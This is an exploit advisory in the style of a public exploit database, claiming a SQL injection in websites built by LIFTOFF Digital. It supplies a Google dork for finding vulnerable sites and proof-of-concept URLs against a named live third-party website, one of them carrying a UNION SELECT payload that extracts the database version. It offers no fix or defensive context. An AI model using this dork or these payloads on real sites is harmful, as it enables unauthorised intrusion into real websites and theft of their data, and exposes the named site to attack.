Website Design & Development by LIFTOFF Digital SQL Injection Vulnerability

# Exploit Title :  Website Design & Development by LIFTOFF Digital SQL Injection Vulnerability
# Date : 2018-07-02
# Exploit Author : Iran Cyber Security Group
# Vendor Homepage : www.gainliftoff.com
# Google Dork : "Website Design & Development by LIFTOFF Digital" inurl:php.?id=
# category : webapps
# Tested on : Win7 , Kali Linux


Proof of Concept : 

 search google Dork : "Website Design & Development by LIFTOFF Digital" inurl:php.?id=
Demo :
 
 https://www.themacandcheesefest.com/event-details.php?id=3' [Sql injection Vulnerability]

 https://www.themacandcheesefest.com/event-details.php?id=-3%27+UNION%20SELECT%201,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17--+

# Discovered by : Mr_null